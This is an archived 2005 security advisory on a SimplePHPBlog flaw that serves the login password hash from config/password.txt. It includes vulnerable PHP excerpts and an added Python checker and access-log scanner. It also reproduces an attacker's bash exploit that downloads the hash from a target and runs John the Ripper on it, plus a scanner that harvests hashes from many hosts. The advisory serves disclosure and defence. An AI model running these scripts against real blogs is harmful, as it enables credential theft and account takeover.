ID SECURITYVULNS:DOC:9470 Type securityvulns Reporter Securityvulns Modified 2005-08-14T00:00:00
Description
The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com
SimplePHPBlog Password Disclosure (Exploit)
SUMMARY
SimplePHPBlog (http://www.simplephpblog.com/) - "The main advantage of
using Simple PHP Blog is that it only requires PHP 4 (or greater) and
write permission on the server."
A vulnerability in SimplePHPBlog allows remote attackers to obtain the
blog's login password hash. The application stores the hash in a plain
text file, config/password.txt, inside its own web-accessible directory,
and nothing stops the web server from serving that file as static
content. An unauthenticated GET request for the file therefore returns
the hash, which can then be cracked offline.
DETAILS
Vulnerable Systems:
 * SimplePHPBlog versions 0.4.0 and prior (the exploit and scanner
   scripts included below claim versions up to and including 0.4.4 are
   affected; the two statements in the original advisory disagree)
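The exposure can be verified without running the exploit script, and after an incident a practitioner also wants to know whether anyone actually fetched the file. The following Python is an added example written for this page; it is not code from the SecuriTeam advisory, from pjphem's scripts or from SimplePHPBlog. probe() requests /config/password.txt under a blog URL and assess_response() decides whether the reply is genuinely a crypt(3) hash (traditional DES or MD5-crypt) rather than a soft-404 HTML page returned with status 200, the false positive that a bare grep for "$1$" cannot rule out (and which would also miss a DES-format hash). find_hash_file_hits() scans web-server access-log lines for successful fetches of the file. The hash values, log lines and addresses in the block are constructed for the example, the base URL is a placeholder, and the assumption that the log is in Apache/nginx combined format is mine.

```python
"""Checks for the SimplePHPBlog config/password.txt exposure.

Added example, not code from the SecuriTeam advisory or from SimplePHPBlog.
Two sides of the same issue:
  * probe()/assess_response(): is the HTTP response for /config/password.txt
    really a crypt(3) hash, or a soft-404 page served with status 200?
  * find_hash_file_hits(): which clients successfully fetched the file,
    according to access-log lines in Apache/nginx combined format (assumed).
All sample bodies, hashes and log lines below are constructed for the example.
"""
import re
import urllib.request
from urllib.error import HTTPError, URLError

# Traditional DES crypt(3): 2-char salt + 11-char hash, all from [./0-9A-Za-z].
_DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
# MD5-crypt, the form the advisory's scanner greps for: $1$<salt, 1-8 chars>$<22 chars>.
_MD5CRYPT_RE = re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$")


def classify_hash(text):
    """Return 'des', 'md5crypt' or None for a candidate password.txt body."""
    body = text.strip()
    if _MD5CRYPT_RE.match(body):
        return "md5crypt"
    if _DES_RE.match(body):
        return "des"
    return None


def assess_response(status, body):
    """Map an HTTP status and body for /config/password.txt to a verdict.

    'exposed:<kind>' - 200 and the body is a crypt(3) hash: the file is served as-is
    'soft-404'       - 200 but the body is not a hash (e.g. an HTML error page)
    'protected'      - 401/403: something denies access to the path
    'absent'         - 404: nothing at that path
    'other:<status>' - anything else
    """
    if status == 200:
        kind = classify_hash(body)
        return f"exposed:{kind}" if kind else "soft-404"
    if status in (401, 403):
        return "protected"
    if status == 404:
        return "absent"
    return f"other:{status}"


def probe(base_url, timeout=10):
    """Fetch <base_url>/config/password.txt and return assess_response()'s verdict."""
    url = base_url.rstrip("/") + "/config/password.txt"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            # 64 bytes is enough for any crypt(3) hash; HTML will not match.
            return assess_response(resp.status, resp.read(64).decode("latin-1"))
    except HTTPError as e:
        return assess_response(e.code, "")
    except URLError as e:
        return f"error:{e.reason}"


# Combined log format; only the fields the check needs are captured.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def find_hash_file_hits(log_lines):
    """Return (ip, timestamp, status) for every 200 response to .../config/password.txt."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        path = m.group("path").split("?", 1)[0]
        if path.lower().endswith("/config/password.txt") and m.group("status") == "200":
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status"))))
    return hits


# Constructed sample log (documentation IP ranges, not a real host).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Jul/2005:01:13:02 +0200] "GET /blog/config/password.txt HTTP/1.0" 200 35 "-" "Wget/1.9"',
    '203.0.113.7 - - [07/Jul/2005:01:13:03 +0200] "GET /blog/index.php HTTP/1.0" 200 8812 "-" "Wget/1.9"',
    '198.51.100.4 - - [07/Jul/2005:02:00:00 +0200] "GET /blog/config/password.txt HTTP/1.1" 403 212 "-" "Lynx/2.8"',
    "garbage line that is not in combined format",
]

if __name__ == "__main__":
    # Offline demonstration; replace with probe("http://host/blog") against a host you own.
    print(assess_response(200, "$1$ab12cd34$" + "x" * 22))
    print(assess_response(200, "<html><body>Not found</body></html>"))
    for ip, ts, status in find_hash_file_hits(SAMPLE_LOG):
        print(f"hash file fetched by {ip} at {ts} (status {status})")
```

A 200 with an HTML body is reported as soft-404 rather than as a disclosure, and a 403 is reported as protected; only a body that parses as a crypt(3) hash counts as exposed. The log check matches on the path suffix so it works whatever directory the blog is installed in.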
Vulnerable code:
bash-3.00# cat install02.php
 $result = create_folder( 'config' );

bash-3.00# cat sb_login.php
 // If there's no password file then need to redirect them.
 $passFile = 'config/password.txt';

----------------------------------------------------------------------------------------
 function create_password ( $user, $pass ) {
 // Generate and store password hash

 $mypasswd = $user.$pass;
 $hashed = crypt($mypasswd);

 // Save File
 $filename = 'config/password.txt';
 $result = sb_write_file( $filename, $hashed );

----------------------------------------------------------------------------------------

 function check_password ( $user, $pass ) {
 // Check password against hashed password file

 $passFile = 'config/password.txt';
 $hashed = sb_read_file( $passFile );

bash-3.00# ls -l `pwd` | grep config
 drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config

The installer creates config/ inside the blog directory, which lives under
the web server's document root, and create_password() writes
crypt($user.$pass) into config/password.txt there. Nothing shipped with the
package (a deny rule for the directory, or a location outside the document
root) keeps the web server from serving the file as static content, which is
why a plain GET for http://host/blog/config/password.txt in the exploit
below succeeds. Two further points for anyone assessing the impact: the
hash input is the username concatenated with the password, so offline
cracking also needs the login name (or a guess at it); and crypt() is called
without a salt argument, so whether the result is a traditional DES hash or
an MD5-crypt ($1$) hash depends on the system default, which the scanner
below does not account for. The world-writable mode on config/ shown by
ls is a separate local weakness and is not what the remote exploit relies on.

Exploit:
bash-3.00$ cat 0xfuck-phpblog.sh
#!/bin/bash
##################################
#
# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for dummies)
#
# 0xpjply CONFIDENTIAL - SOURCE MATERIALS
#
# This is published proprietary source code of 0xpjply
#
# (C) COPYRIGHT 0xpjply security guru group, 2005
# All Rights Reserved
#
# dummy exploit written by pjphem && infected on July 2005
#
##################################
# contact:
# pjphem && LazyCrs
#
# pjphem@mybox.it && fLazyCrs@GMail.com
#
# Greetz:
#
# You think you know? You have no idea!
# fluffi-
#
# RAFA FREE
#
##################################
echo ""
echo ""
echo " +++++++++++++++++++++++++++++ "
echo " =: SimplePHPBlog Remote Password Disclosure. - for dummies := "
echo " +++++++++++++++++++++++++++++ "
echo ""
echo " c0de by pjphem "
echo ""
echo ""
echo " vulnerable: Simple PHP Blog 0.4.4 <= "
echo ""
echo ""
echo -n "enter a hostname: " ; read hostname ;
echo -n "enter the blog directory: " ; read dir ;
echo ""
echo "[*] preparing the working directory..."
mkdir 0xpjply
cd 0xpjply
echo "[*] OK!"
echo "[*] fetching the password hash..."
# The whole vulnerability: the hash file is served as a static file under the web root.
wget "http://$hostname/$dir/config/password.txt"
echo "[*] OK!"
echo ""
echo ""
echo "Password hash (md5):"
echo ""
cat password.txt
echo ""
rm -rf password.txt
echo ""
echo -n "Download John the Ripper (password cracker)? [Y/n] "
read Q
if [ "$Q" = y ]; then
 echo "[*] OK!" ; wget [John the RipperURL]/john.tar.gz   # placeholder URL in the original; supply the real one
else
 exit 1
fi
tar -zxf john.tar.gz
cd john
echo ""
echo "[*] downloading the password hash again..."
echo ""
wget "http://$hostname/$dir/config/password.txt"
echo ""
echo "Done!"
echo ""
echo "Starting John to crack the password... enjoy"
./john password.txt
echo ""
echo ""

bash-3.00$ cat 0xfuck-phpblog-scanner.sh
#!/bin/bash
#
# Simple tester for phpblog
#
# phpblog 0.4.4 <=
#
####################
echo "host , blog directory: (ex. test.it blog)"
read HOST BLOG
# Record the line only if it carries an MD5-crypt hash. The pattern must be
# quoted: unquoted, the shell expands $1 to the script's (empty) first
# argument and grep ends up matching every line, including error pages.
lynx -source "http://$HOST/$BLOG/config/password.txt" | grep -F '$1$' >> 0wn4bl3
bash-3.00$

ADDITIONAL INFORMATION
The information has been provided by pjphem (pjphem@mybox.it).

========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.

Record metadata: published 2005-08-14, modified 2005-08-14; no CVE assigned;
no CVSS score; source: https://vulners.com/securityvulns/SECURITYVULNS:DOC:9470